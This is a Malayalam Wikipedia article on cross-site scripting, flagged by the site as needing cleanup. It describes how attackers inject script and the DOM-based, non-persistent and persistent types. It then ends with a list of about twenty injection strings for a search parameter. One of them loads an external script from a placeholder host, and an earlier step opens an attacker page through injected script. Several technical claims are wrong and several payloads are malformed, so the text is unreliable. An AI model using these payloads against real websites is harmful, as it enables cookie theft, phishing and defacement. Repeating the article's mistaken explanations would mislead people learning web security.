ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ്

വിക്കിപീഡിയ, ഒരു സ്വതന്ത്ര വിജ്ഞാനകോശം.
 വിക്കിപീഡിയയുടെ ഗുണനിലവാരത്തിലും, മാനദണ്ഡത്തിലും എത്തിച്ചേരാൻ ഈ ലേഖനം വൃത്തിയാക്കി എടുക്കേണ്ടതുണ്ട്‌.
ഈ ലേഖനത്തെക്കുറിച്ച് കൂടുതൽ വിശദീകരണങ്ങൾ നൽകാനാഗ്രഹിക്കുന്നെങ്കിൽ ദയവായി സംവാദം താൾ കാണുക.

വെബ്ബ് ആപ്ലിക്കേഷനുകളിലെ വെബ് താളുകളിൽ സംഭവിക്കാവുന്ന ഒരു സുരക്ഷാപ്രശ്നമാണ് ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ് Cross-site scripting. ഇതു വഴി ഉപയോക്താക്കൾ ഉപയോഗിക്കുന്ന ഒരു വെബ് താളിലേക്ക് ഹാക്കർമാർക്ക് ജാവാസ്ക്രിപ്റ്റ് പോലുള്ള ക്ലൈന്റ് സൈഡ് സ്ക്രിപ്റ്റുകൾ കൂട്ടിച്ചേർക്കുവാൻ സാധിക്കുന്നു.

സൈബർ ലോകത്തിന്റെ തീരാ തലവേദനയാണ് ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ്. വെബ്സൈറ്റുകൾ ഡിഫേസ് ചെയ്യാൻ അഥവാ വെബ്‌ പേജുകളുടെ മുഖച്ചിത്രം മാറ്റാൻ കഴിയുന്ന ഒരു എഴുതാന്നു എക്സ്-എക്സ്-എസ് Xss malicous script ഇത് ആയതു കൊണ്ട് തന്നെ ഒരു വെബ്‌സൈറ്റ്‌ ഉടമയ്ക്ക് അയാളുടെ കമ്പ്യൂട്ടറിൽ നിന്നും വെബ്‌സൈറ്റ് അപ്‌ഡേറ്റ് ചെയ്യുമ്പോൾ കാണാൻ കഴിയില്ല മറ്റൊരാൾ കമ്പ്യൂട്ടറിൽ ആ വെബ്സൈറ്റ് സന്ദർശിക്കുമ്പോൾ അയാൾക്ക് ഹാക്കർമാർ ചെയ്ത വെബ്‌ പേജ് കാണുന്നു. സാധാരണയായി പിഷിംഗ്, കുക്കി സ്റ്റില്ലിംഗ്, എന്നിവയ്ക്ക് വേണ്ടിയാണ് ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ് XSS ചെയ്യുന്നത്. ഏറ്റവും വലിയ സെർച്ച്‌ എൻജിൻ ആയ ഗൂഗിൾ പോലും ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ്റ്റെ പിടിയിലാണ്. ഇയിടെ സോഷ്യൽ നെറ്റ്‌വർക്ക് ആയ ഫേസ്‌ബുക്കിൽ കണ്ടത്തിയ ഒരു എക്സ്.എക്സ്.എസ് ഹോലെൾ ഇവിടെ നൽകുന്നു. channel facebook com-cross-site-scripting

ഉള്ളടക്കം

[തിരുത്തുക] ഒരു ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ് XSS എങ്ങനെ പ്രവർത്തിക്കുന്നു

  • ഒരു ഹാക്കർ അയാൾക്ക് അവശ്യമായ രീതിയിലുള്ള ഒരു വെബ്‌ പേജ് നിർമിക്കുന്നു(youhacked.htm)
  • ആ പേജ് ഒരു വെബ്‌ സൈറ്റിൽ അപ്‌ലോഡ്‌ ചെയ്യുന്നു.(http://www.anysite.com/youhacked.htm)
  • എന്നിട്ട് അത് ഒരു ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ് XSS ഉള്ള വെബ്‌ സൈറ്റ് ഓ, എക്സ്-എക്സ്-എസ്നു സാധിക്കുന്ന യു.ആർ.അൽ (victimwebsite.com/search.php?q=) കണ്ടുപിടിക്കുന്നു
  • (victimwebsite.com/search.php?q=)എന്നതിന് അപ്പുറത്ത് ജാവാസ്ക്രിപ്റ്റ്‌ ഉപയോഗിച്ചു ഇങ്ങനെ ( <script>window.open("http://www.anysite.com/youhacked.htm.com/" )</script> ) എഴുതി ചേർത്ത് എന്റർ അമർത്തുന്നു.
  • തന്മൂലം http://www.anysite.com/youhacked.htm.com എന്ന വെബ്‌ പേജ് victimwebsite.com സെർവറിൽ സേവ് ആകുന്നു
  • ഇതൊന്നും അറിയാത്ത കമ്പ്യൂട്ടർ ഉപയോക്താവ്‌ (vitimwebsite.com) എന്ന വെബ്‌സൈറ്റ് സന്ദർശിക്കുമ്പോൾ ഹാക്കർമാർ ചെയ്തു വച്ച ചതിക്കുഴിക്കുള്ളിൽ വീഴുന്നു.

[തിരുത്തുക] വിവിധതരം എക്സ്-എക്സ്-എസ്

സാധാരണയായി മൂന്ന് തരത്തിലുള്ള എക്സ്-എക്സ്-എസ് ആണ് വെബ്‌സെർവറുകളിൽ കണപ്പെടുന്നത് അവ താഴെ കൊടുക്കുന്നു.

  • ഡോം ബേസ്‌ഡ്‌ എക്സ്-എക്സ്-എസ് - DOM-Based XSS
  • നോൺ പെര്സിസേന്റ്റ്‌ - Non-persistent XSS
  • പെര്സിസേന്റ്റ്‌ - Persistent XSS

[തിരുത്തുക] ഡോം ബേസ്‌ഡ്‌ എക്സ്-എക്സ്-എസ് - DOM-Based XSS

ഇ ഡോം ബേസ്‌ഡ്‌ എക്സ്-എക്സ്-എസ് പിടിയ്ൽ പെട്ട വെബ്സൈറ്റ്കൾക്ക് വളരെ പെട്ടന്നു തന്നെ തകർക്കാൻ ഹാക്കർമാർക്ക് കഴിയും. ഡോം ബേസ്‌ഡ്‌ എക്സ്-എക്സ്-എസ് ഉള്ള ഒരു വെബ്സൈറ്റ് അല്ലെങ്കിൽ അതുമൂലം തകർന്ന വെബ്‌ പേജ്കൽ എന്നിവയൊന്നും ഗൂഗിൾ സേർച്ച്‌ എൻജിൻ ടാറ്റ ബേസിൽ നിന്നും മായിച്ച് കളയാൻ എളുപ്പമല്ല. ആയതു കൊണ്ടു തന്നെ സൈബർ ലോകം ഡോം ബേസ്‌ഡ്‌ എക്സ്-എക്സ്-എസ് - DOM-Based XSS ഇപ്പോഴും പേടിക്കുന്നു

[തിരുത്തുക] നോൺ പെര്സിസേന്റ്റ്‌ എക്സ്-എക്സ്-എസ് Non-persistent XSS

ഇത്തരം എക്സ്-എക്സ്-എസ്സുകൾ ചില സമയങ്ങളിൽ മാത്രമേ ഒരു കമ്പ്യൂട്ടർ ഉപഭോക്താവിനു കാണുകയുള്ളൂ ആയതുകൊണ്ട് ഇ നോൺ പെര്സിസേന്റ്റ്‌ - Non-persistent XSS കൾ കുക്കി സ്റ്റില്ലിംഗ് മാത്രമേ ഹാക്കർമാർ ഉപയോഗികുന്നത്

[തിരുത്തുക] പെര്സിസേന്റ്റ്‌ എക്സ്-എക്സ്-എസ് Persistent XSS

മുകളിൽ പറഞ്ഞ നോൺ പെര്സിസേന്റ്റ്‌ - Non-persistent XSS നോട് ഉപമിക്കാൻ കഴിയും. എന്നാൽ ഇതു ഗസ്റ്റ്‌ ബുക്ക്‌,ഫോറംസ്, ഷൌട്ട് ബോക്സ്‌, കമെന്റ്റ്‌ ബോക്സ്‌ എന്നിവയിൽ കണപ്പെടുന്നു,

[തിരുത്തുക] എങ്ങനെ ഒരു ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ് ഹോൾ കണ്ടെത്താം

സാധാരണയായി സെർച്ച്‌ ബോക്സ്‌സുകളില്ലും ,ഗസ്റ്റ് ബുക്കുകളിലുമാണ് കൂടുതലായി കണപ്പെടുന്നത്.. പെട്ടെന്നു കണ്ടെത്താൻ വേണ്ടി ഗൂഗിൾ ടോർക്സ്(Google Dorks) ഉപയോഗിക്കുന്നു.

   website.com/search.php?q="><script>alert('XssED BY XssER')</script>
   website.com/search.php?q="><script>alert("XssED BY XssER")</script>
   website.com/search.php?q="><script>alert("XssED BY XssER");</script>
   website.com/search.php?q="><script>alert(/XssED BY XssER");</script>
   website.com/search.php?q=//"><script>alert(/XssED BY XssER/);</script>
   website.com/search.php?q=abc<script>alert(/XssED BY XssER/);</script>
   website.com/search.php?q=abc"><script>alert(/XssED BY XssER/);</script>
   website.com/search.php?q=abc"></script><script>alert(/XssED BY XssER/);</script>
   website.com/search.php?q=abc//abc"></script>alert(/XssED BY XssER/);</script>
   website.com/search.php?q=000"><script></script><script>alert(XssED BY XssER);</script>
   website.com/search.php?q=000abc</script><script>alert(/XssED BY XssER/);</script>
   website.com/search.php?q=--<script>"></script>alert(/XssED BY XssER/);</script>
   website.com/search.php?q=pwned<script>document.write('XssED BY XssER');</script>
   website.com/search.php?q=pwned</script><script>document.write(XssED BY XssER);</script>
   website.com/search.php?q=pwned')alert(XssED BY XssER);//
   website.com/search.php?q=pwned";)alert(XssED BY XssER);//
   website.com/search.php?q=pwned");alert(/XssED BY XssER/);//
   website.com/search.php?q=pwned//"></script><script>location.href='javascript:alert(/XssED BY XssER/);</script>
   website.com/search.php?q="><img src='javascript:alert('XssED BY XssER');'>
   website.com/search.php?q="><script src='http://malicous js'</script>

ഇവയെല്ലാം എക്സ്-എക്സ്-എസ് സ്ക്രിപ്റ്റിംഗ് നു ഉദാഹരണമാണ്..

"http://ml.wikipedia.org/w/index.php?title=ക്രോസ്_സൈറ്റ്_സ്ക്രിപ്റ്റിംഗ്&oldid=1195705" എന്ന താളിൽനിന്നു ശേഖരിച്ചത്
സ്വകാര്യതാളുകൾ
നാമമേഖല

ചരങ്ങൾ
നടപടികൾ
ഉള്ളടക്കം
പങ്കാളിത്തം
വഴികാട്ടി
ആശയവിനിമയം
പണിസഞ്ചി
ഇതരഭാഷകളിൽ